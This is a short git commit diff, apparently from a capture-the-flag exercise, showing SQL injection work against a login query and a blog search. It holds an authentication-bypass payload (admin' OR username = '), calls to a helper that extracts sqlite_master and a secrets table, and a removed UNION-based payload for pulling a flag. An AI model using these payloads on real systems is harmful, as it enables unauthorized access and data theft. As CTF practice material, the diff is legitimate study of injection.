This commit is contained in:
2025-12-13 15:45:36 +00:00
parent 6ff3273351
commit ef11ce0307
3 changed files with 2 additions and 10 deletions

View File

@@ -1,3 +1,3 @@
SELECT id, username, password, bio, age, jackpot_val FROM user WHERE username = '' AND password = '<pass>' SELECT id, username, password, bio, age, jackpot_val FROM user WHERE username = '' AND password = '<pass>'
admin' OR username = ' admin' OR username = '

View File

@@ -60,11 +60,3 @@ def stringer(column: str, table: str, where: str = "1 = 1", max: int = 50) -> li
#print(stringer("name", "sqlite_master")) #print(stringer("name", "sqlite_master"))
#print(stringer("sql", "sqlite_master", "name == 'super_s_sof_secrets'", 100)) #print(stringer("sql", "sqlite_master", "name == 'super_s_sof_secrets'", 100))
print(stringer("secret", "super_s_sof_secrets", max=120)) print(stringer("secret", "super_s_sof_secrets", max=120))
# SELECT id, title, content FROM blog_post WHERE title LIKE '<input>
#' AND id = 0 UNION SELECT id, title, content FROM blog_post WHERE title LIKE 'flag'; --